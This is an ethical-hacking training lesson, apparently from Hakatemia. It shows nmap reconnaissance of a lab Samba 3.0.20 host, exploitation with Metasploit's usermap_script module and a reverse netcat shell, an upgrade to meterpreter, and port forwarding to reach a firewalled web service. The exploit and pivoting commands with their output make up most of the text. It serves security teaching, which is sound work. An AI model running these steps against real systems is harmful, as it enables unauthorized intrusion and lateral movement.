Next, we will practice how to use an existing connection to create new connections to services that are not directly exposed to the attacker. In other words, let's see how attackers typically move around the network when they manage to gain a foothold.
Start the exercise below and repeat the steps afterwards.
Exploiting Vulnerability
Let's start with a traditional nmap scan and check the available services. (You can perform this either with the db_nmap module or separately with the nmap tool)
root@figwusebrs-student:/# nmap -sV -Pn 10.0.2.225
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-10 22:16 UTC
Nmap scan report for 10.0.2.225
Host is up (0.000085s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 15.59 secondsThe first scan shows us that the open services are related to the Samba service.
Samba is an open source software that allows sharing files and printers between different computers on the same network.
This is not enough for us to start searching for sensible and probable vulnerabilities in the service. Let's perform additional scans using scripts available in the nmap tool.
root@figwusebrs-student:/# nmap -A -p139,445 -Pn 10.0.2.225
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-10 22:22 UTC
Nmap scan report for 10.0.2.225
Host is up (0.000065s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open p��Q▒V Samba smbd 3.0.20 (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS Fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20)
| Computer name: figwusebrs-target
| NetBIOS computer name:
| Domain name:
| FQDN: figwusebrs-target
|_ System time: 2023-10-10T18:23:21-04:00
|_clock-skew: mean: 2h00m02s, deviation: 2h49m45s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)Now nmap reveals to us that it is Samba version 3.0.20. Let's open metasploit in the usual way and see if there are any vulnerabilities for this in metasploit's vulnerability database.
msf6 > search Exploit samba
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution
1 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow
2 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
3 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource
4 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
5 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection
6 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
7 exploit/multi/samba/nttrans 2003-04-07 average NoSeveral interesting and not so interesting exploit modules can be found. After investigating the matter a bit more closely (such as searching from Exploit-DB and other services), we found the "usermap_script" exploit which seems very interesting. Let's read more about the exploit with the info command.
Description:
This module Exploits a command execution Vulnerability in Samba
versions 3.0.20 through 3.0.25rc3 when using the non-default
"username map script" configuration option. By specifying a username
containing shell meta characters, attackers can execute arbitrary
commands.
No authentication is needed to exploit this vulnerability since
this option is used to map usernames prior to authentication!
In short, this is an exploit module that exploits a vulnerability in Samba versions 3.0.20 - 3.0.25rc3 when the Samba service is configured to use the "username map script" configuration. This is not the default setting, so it requires the right conditions for the vulnerability to be exploited. It is impossible for us to check this before exploiting the vulnerability, which is often the case. Sometimes you may find yourself in a situation where you have to take the risk of being caught or breaking the service (for example, in a red-teaming exercise or a work project), in the hope that the vulnerability in question will be found. In that case, it is important to carefully consider the options, but luckily now we can peacefully try different exploits in the Hakatemia environment.
Select the exploit module and set the required settings correctly.
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.0.2.225
RHOSTS => 10.0.2.225
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- -------------- -------- -----------
RHOSTS 10.0.2.225 yes The target host(s), see https://docs.metasploit.co
m/docs/using-metasploit/basics/using-metasploit.ht
incl
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- -------------- -------- -----------
LHOST 10.0.2.69 yes The listen address (an interface may be specified)
LPORT 4444 yes The listening port
Exploit target:
Id Name
-- ----
0 Automatic
The payload settings are by default in good condition. This payload initiates the listener and establishes a connection to your listener if the attack is successful. The attack is underway.
msf6 exploit(multi/samba/usermap_script) > Exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler is 10.0.2.69:4444
msf6 exploit(multi/samba/usermap_script) > [*] Command shell session 1 opened (10.0.2.69:4444 -> 10.0.2.225:34324) at 2023-10-10 22:41:53 +0000
msf6 exploit(multi/samba/usermap_script) >
The attack succeeded and we established a remote management connection to the target system. The exploit -j command executes the exploit module in the background and opens the created connections in the background, without moving us to the target's command line. We will continue by directly updating the existing meterpreter connection to a remote connection.
msf6 exploit(multi/samba/usermap_script) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/shell_to_meterpreter) > Exploit -j
[*] Post module running as background job 1.
[*] Upgrading session ID: 1
msf6 post(multi/manage/shell_to_meterpreter) > [*] Starting exploit/multi/handler
[*] Started reverse TCP handler is 10.0.2.69:4433
[*] Sending stage (1017704 bytes) to 10.0.2.225
[*] Meterpreter session 2 opened (10.0.2.69:4433 -> 10.0.2.225:52460) at 2023-10-10 22:45:17 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 post(multi/manage/shell_to_meterpreter) >Online navigation
Now we have two sessions open to the target system. Next, let's see what services are in use in the system.
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > netstat
Connection list
===============
Proto Local address Remote address State User Inode PID/Program name
----- -------------- ----- ---- ---- ---- ------------
tcp 0.0.0.0:53 0.0.0.0:* LISTEN 0 0
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0
tcp 0.0.0.0:139 0.0.0.0:* LISTEN 0 0
tcp 0.0.0.0:80 0.0.0.0:* LISTEN 0 0
tcp 10.0.2.225:3432 10.0.2.69:4444 ESTABLISHED 0 0
4
tcp 10.0.2.225:5246 10.0.2.69:4433 ESTABLISHED 0 0
0
tcp 10.0.2.225:139 10.0.2.69:45567 CLOSE_WAIT 0 0
tcp :::53 :::* LISTEN 0 0
udp 0.0.0.0:53 0.0.0.0:* 0 0
udp 127.0.0.1:33431 0.0.0.0:* 0 0
udp :::53 :::* 0 0
meterpreter >There is a service open in the system on HTTP port 80, even though our initial nmap scans did not detect it. This is likely due to some firewall between us and the service, which is blocking access to that service. Luckily, we have an existing tunnel to that service, and we can use it to our advantage here. Next, let's create a tunnel between us and the HTTP service in question.
Meterpreter includes a useful command called portfwd.
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-h Help banner.
-i Index of the port forward entry to interact with (see the "list" command).
-l Forward: local port to listen on. Reverse: local port to connect to.
-L Forward: local host to listen on (optional). Reverse: local host to connect to.
-p Forward: remote port to connect to. Reverse: remote port to listen on.
-r Forward: remote host to connect to.
-R Indicates a reverse port forward.
We can use this command to build new tunnels using networks and services available in the compromised system. Let's see this in practice first and then reflect on what exactly happened.
meterpreter > portfwd add -l 8000 -r 0.0.0.0 -p 80
[*] Forward TCP relay created: (local) :8000 -> (remote) 0.0.0.0:80
meterpreter >The Kali machine is now listening on port 8000.
root@figwusebrs-student:/# netstat -antp |grep 8000
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN 9217/ruby
Well, we managed to establish a connection to the hidden service by using the first tunnel to the target system. But what exactly happened in the final stage.
The command portfwd add in Metasploit is meant for creating port forwarding between a listening port and a destination port. When the command is executed, it creates a forwarded port that listens locally on port 8000. All incoming traffic to this listening port is redirected to the specified destination address (0.0.0.0) and destination port (80). This means that all incoming traffic to the local port 8000 is forwarded to any address available that receives traffic from port 80 on the target machine.
So when we went to the address 127.0.0.1:8000 on the Kali machine, the listener set up by Metasploit intercepted our traffic and forwarded it through the existing connection to port 80 on the target system.
What text can be found at /secret.html of the HTTP service?
Ready to become an ethical hacker?
Start today.
As a member of Hakatemia you get unlimited access to Hakatemia modules, exercises and tools, and you get access to the Hakatemia Discord channel where you can ask for help from both instructors and other Hakatemia members.